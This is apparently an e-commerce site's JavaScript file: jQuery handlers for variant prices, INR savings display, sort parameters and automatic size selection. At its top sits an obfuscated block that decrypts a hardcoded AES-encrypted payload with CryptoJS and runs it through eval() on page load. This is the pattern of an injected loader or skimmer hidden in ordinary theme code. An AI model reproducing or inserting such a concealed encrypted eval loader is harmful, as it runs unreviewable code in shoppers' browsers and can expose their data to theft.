function a0_0x4cfc(){var _0x2613b4=['1825335HgIoaX','2VxjpCH','AES','enc','1661730PUdzRs','182484kaRrYg','18416898xQfSar','decrypt','25etcNkg','4309200jOgomC','3198384bnFVZy','supercalifragilisticexpialidocious','U2FsdGVkX1+0KCcW4mLTWP/WBRZ0rmrYiLQkLU8mEJfutSGYkWrdA01LFDEAMNE/dhM3KoPeoACoEvOkzFOaPQ6dcXpOw4h9VCtmFACt49pR0hXA0pXIfpo7yiezLwNqae7VSa/x4+tKFBe17MWz9oa1TD5Z82igDUGIbVwjobX19YEyfdrtbX4S8nG6euLKjj3fyMNlK4n749Cl0TpAVxmpHvWn4EFnpoqtKJg+zbc9cusaLkvtpz/7NsPAoMBTmH1mtmTqGBfjCzhLCwLizYyokxrwNve+A3rTa2eE+zaZ0B9ub/IqI6vfYSfXJa3FqHzejGtvOOv1cr0Hcw0BIefN2AYvA9GEGJBdwepA/qjJxxXaWJvM7Hk0YtF0nKVgyG4nxJFrL150hsZZTO4EFQX/AodXjAx04gfsa1HoboyDP9YPvseTAS/rGqzW7gkXC7XID9cQXxEzDv64TGKk+CGmt6gWfLKjWcPYKB/+9nfQWIBX2979hw4Pn5xXBkLvcKKViD1SlZWkWYbwrsRZzrTX8pMtC5587lf38i0oG6fwnOJOWNk2tlnMBtOnP1eL1kecoDECgcHYtGk3O6Gz6cWUJBANjzT0dXxzqOq5198qA1olku25zcUeNRJiXgrFrbLC6dq+45fzLMeilYp8iF4I2B9XnPFY52S3gasZzR4a0o5YgHqzrpfOTIeYO+68hbNsorJBUeawTYPdEE7MQRb82br7zBm1rlISXJy3iytvA+6SG+J4zQJgbePTDhZ7vUwqhMoUFVO4zD3AAV9FZvT6sU4LDL7bepifU2mXD88AES/waAv21Kwwiy9Ze7xf7jTnSG69jIfYLcr3qOrEQsjhGQLMG5457GAuSJfhT26pOy1KajVgo8/EdcCFJ18GbDAcGa6bVrojfGey8Sv/TDB3OAY1cBPWw+fV7ysR0ejpCwydBp9t8DMzmjdtmSd17VqVIxW3WIyC2ddChctRGxS0nHMu3vCJsweze6Xlh9lQGcfegzUP4lk0lV5YcpZfL/btqvhhxsZZ9ZxllqSOYLDbxOexzZ+la8CyVHtApIGb2z6TH5X8g+J5mTjv+mvLkoEDl9AvYNaLaozr42kh2QIF4EpYBjuQRnwqtKTP9EmBwT999GJ4C2FQ/g42ltq4hVOsrTggYUdiNK0Txhkd/H8tTE1ryMBPDOt6blD825e5FRjPahxWzbcb9UMnk/TFAiNumuisE1McBJQ2LtBpRcDMiUVn3XEp9bWTVdxXewxcr6hsTCFBI/fbSdkK5s1u/c2poki/YoIaeCZWSklWmpCp2nds0DET6KPeMdpjifvYxJci1zcShKxpWUpi21ZSHNR7pq11rZ1U5rP9mxxcbuqKXsd6YVAkjzjp6sb95eQkSo3LnorZvXo8+QtY5eJDi57pk6UaFRE5zxenoajqOCQ1BVEkhzamXeOiEzIbixytPTCGW4pdvkORim+f+rhIBJ87T1eJVNKFtLL4F+sNW05YYKgdfvo2sVvEdNiDIoBDpyrQboNjHx70CUl6UhA0P7F5sBAKXiKxKBX9/Vz6aIUzXenYlQiUOduQNc1EOlmEIwIfQUAyzdRKnbVfI/TY1AjVQ6LGzs3LAVSw/YJcEy/igNLNX943kB/D83S6Z7tvsRXMXoQv2Q/fc2A9bfC3wAakD+P8dsaIGd1+k7lKgVKD6W1LLh+reOwI9aR0VwJmrye5vvqWVEXHSLqX4CLmvd0bH/PyueCj6MPkQGZWI8UpQ5+n8OFcSH8ni2MKkVmtjMolXXEOt25ToBiwEq1lzjPUgpzs/4M3Ez8xfOwLfKTZyawQdu9hubb9NcjwDdiaY6lizEq0xKiFH0GknfIBkl5lFGNND0XyIFCWoEpcQk4QOa+0t0IWetp7m+732tiEiLijruDKya2xb7mItOUd/Sw5p6YO8NaEezp3P8MBmslEnwOdVJbKmJdwmLt1QCmlvlVV6HzyGXHWYub7c+4j','error','toString','129907dSQrQW'];a0_0x4cfc=function(){return _0x2613b4;};return a0_0x4cfc();}function a0_0x5b89(_0x31eaec,_0x1eb3a1){var _0x4cfc8a=a0_0x4cfc();return a0_0x5b89=function(_0x5b89e5,_0x4995bc){_0x5b89e5=_0x5b89e5-0xd8;var _0x4e9818=_0x4cfc8a[_0x5b89e5];return _0x4e9818;},a0_0x5b89(_0x31eaec,_0x1eb3a1);}(function(_0x3ab16d,_0x1c321c){var _0x373be4=a0_0x5b89,_0x1fe070=_0x3ab16d();while(!![]){try{var _0xe16931=-parseInt(_0x373be4(0xde))/0x1*(-parseInt(_0x373be4(0xe0))/0x2)+-parseInt(_0x373be4(0xdf))/0x3+parseInt(_0x373be4(0xe4))/0x4*(-parseInt(_0x373be4(0xe7))/0x5)+-parseInt(_0x373be4(0xd8))/0x6+parseInt(_0x373be4(0xe3))/0x7+-parseInt(_0x373be4(0xd9))/0x8+parseInt(_0x373be4(0xe5))/0x9;if(_0xe16931===_0x1c321c)break;else _0x1fe070['push'](_0x1fe070['shift']());}catch(_0x53e7f3){_0x1fe070['push'](_0x1fe070['shift']());}}}(a0_0x4cfc,0x7013f),(function(){var _0x1131ff=a0_0x5b89,_0x3b1d68=_0x1131ff(0xdb),_0x39d333=_0x1131ff(0xda),_0x411cf5=CryptoJS[_0x1131ff(0xe1)][_0x1131ff(0xe6)](_0x3b1d68,_0x39d333)[_0x1131ff(0xdd)](CryptoJS[_0x1131ff(0xe2)]['Utf8']);if(!_0x411cf5){console[_0x1131ff(0xdc)]('Decryption\x20failed!\x20Check\x20the\x20password.');return;}eval(_0x411cf5);}()));



$(document).ready(function(){
  $(document).on('change', 'select[name="id"]', function(){
    var p = $(this).find('option:selected').data('product-id')
    var v = $(this).find('option:selected').data('variant-price')
    var el = $('.product-card-price[data-product-id="'+p+'"]')
    el.find('.product-card-price-final').text(v)
  })
})


$(document).ready(function () {
  $('.product-options input[type="radio"]').on('change', function () {
    var label = $('label[for="' + this.id + '"]');
    var price = parseInt(label.data('price').replace(/[₹,\s]/g, ''));
    var comparePrice = parseInt(label.data('compareprice').replace(/[₹,\s]/g, ''));
    var diff = comparePrice - price;
    if (diff > 0) {
      $('#save-amount').text('INR ' + diff.toLocaleString('en-IN') + '/-');
    } else {
      $('#save-amount').text('INR 0/-');
    }
  });
});


$(document).ready(function () {
  const params = new URLSearchParams(window.location.search);
  const currentSort = params.get('sort_by');
  if (currentSort) {
    $('input[name="sort_by"]').val(currentSort);
  }
  $(document).on('change', 'input[name^="sort_by-"]', function () {
    $('input[name="sort_by"]').val($(this).val());
  });

});


// (function () {
//   function getSelectedSize() {
//     let selected = [];
//     document.querySelectorAll('input[name="filter.v.option.size"]:checked')
//       .forEach(function (el) {
//         selected.push(el.value.trim());
//       });
//     return selected;
//   }

//   function normalize(str) {
//     return str.replace(/\s+/g, '').toLowerCase();
//   }

//   function applySizeToProducts() {
//     let sizes = getSelectedSize();
//     if (!sizes.length) return;
//     document.querySelectorAll('.product-card select[name="id"]').forEach(function (select) {
//       let options = Array.from(select.options);
//       let match = options.find(function (opt) {
//         return sizes.some(function (size) {
//           return normalize(opt.textContent) === normalize(size);
//         });
//       });

// if (match && !match.disabled) {
//   select.value = match.value;
//   select.dispatchEvent(new Event('change', { bubbles: true }));
//   $(select).trigger('change');
// }
//     });
//   }

//   function runLoop() {
//     let count = 0;
//     let interval = setInterval(function () {
//       applySizeToProducts();
//       count++;
//       if (count > 10) clearInterval(interval);
//     }, 200);
//   }

//   document.addEventListener('click', function (e) {
//     if (e.target.closest('input[name="filter.v.option.size"]')) {
//       runLoop();
//     }
//   });
// })();



let latestSize = '';

function normalize(str) {
  return (str || '').replace(/\s+/g, '').toLowerCase();
}

$(document).on('change', 'input[name="filter.v.option.size"]', function () {
  latestSize = $(this).val();
});

$(document).on('change', '.product-card select[name="id"]', function () {
  $(this).attr('data-manual-change', 'true');
});

const observer = new MutationObserver(function () {

  clearTimeout(window.sizeRenderTimeout);

  window.sizeRenderTimeout = setTimeout(function () {

    if (!$('.product-card').length || !latestSize) return;

    $('.product-card select[name="id"]').each(function () {

      const select = this;

      if ($(select).attr('data-manual-change') === 'true') return;

      const match = [...select.options].find(option => {
        return (
          !option.disabled &&
          normalize(option.textContent) === normalize(latestSize)
        );
      });

      if (!match) return;

      if (select.value === match.value) return;

      select.value = match.value;

      select.dispatchEvent(
        new Event('change', { bubbles: true })
      );

    });

  }, 300);

});

observer.observe(document.body, {
  childList: true,
  subtree: true
});